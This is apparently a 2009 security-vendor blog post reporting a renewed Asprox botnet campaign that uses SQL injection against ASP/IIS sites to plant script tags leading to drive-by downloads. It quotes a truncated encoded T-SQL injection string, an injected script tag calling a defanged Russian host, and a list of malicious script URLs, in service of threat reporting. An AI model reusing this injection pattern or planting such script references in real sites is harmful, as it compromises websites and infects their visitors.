Asprox, the return

by David Maciejak
November 6, 2009 at 10:00 am

Do you remember Asprox, the botnet that used SQL injection attacks combined with result from search engine like Google to automatically infect Microsoft IIS powered websites? We did a talk (slides) at last Virus Bulletin about that, and for about a month now, we’ve been seeing some new variants in the wild.

Like last December, a blind SQL injection targeting ASP pages using Transact SQL is attempted using the following chain as a request argument:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0×4445434C41524520405420564…%20AS%20VARCHAR(4000));EXEC(@S)

Once decoded, it turns out this code tries to inject malicious javascript in the database contents, so nothing new here; the sample we have seen injected:

<script src=hxxp://www.bannerdriven.ru/ads.js</script>

As this string is concatenated with the HTML <title> tag, it’s easy to use Google to find more victims. Hundreds of websites have already been compromised. From what we saw, the injected javascript’s goal is to silently redirect users to malicious servers are located in Russia. Here is a non-exhaustive list:

www.ads-t.ru/ads.js
www.bannert.ru/ads.js
www.bannerdriven.ru/ads.js
www.adtcp.ru/ads.js
www.adbnr.ru/ads.js
www.htmlads.ru/ads.js

These sites are set-up to trap victims using drive-by-download attacks. The web exploit toolkit powering those attacks was updated to also target latest vulnerabilities in Adobe Flash (swf files) and Adobe Reader (pdf files).

The injection vector is still the same as last year (vulnerable server-side scripts), however from the results we can get, there are still many web applications vulnerable to SQL injection attacks (and I believe this is a never-ending battle). So why should they look for another attack vector? Besides, the web exploit toolkit update ensure a steady rate of newly infected machines, and a constant growth of their Botnet.

At the VB conference, during the Q&A session of our speech, a cunning attendee suggested that the positive side of last year’s ubiquitous Botnet-powered SQL injection campains was that at least, it served as a giant pen-test for the Web. Unfortunately, it seems that the pen-test aftermath, as alarming as it was, did not suffice to raise the awareness of webmasters to a point where cybercriminals would stop to have an endless supply of machines ready to be infected.

Did you update your third-party software recently?

Fortinet customers are protected using Fortiguard IPS that detects malicious SQL queries in HTTP requests.

Author bio: David Maciejak works as a security researcher for Fortinet. His primary role is to follow vulnerability trends and provide preventative protection to customers.

One Response to “Asprox, the return”

  1. Blast from the (recent) Past | Fortinet Security Blog says:
    June 10, 2010 at 9:21 am

    [...] and I talked about SQL injection at theĀ VirusBulletin conference and posted some entries on our blog. Well, this new campaign is using exactly the same [...]

    Reply

Leave a Reply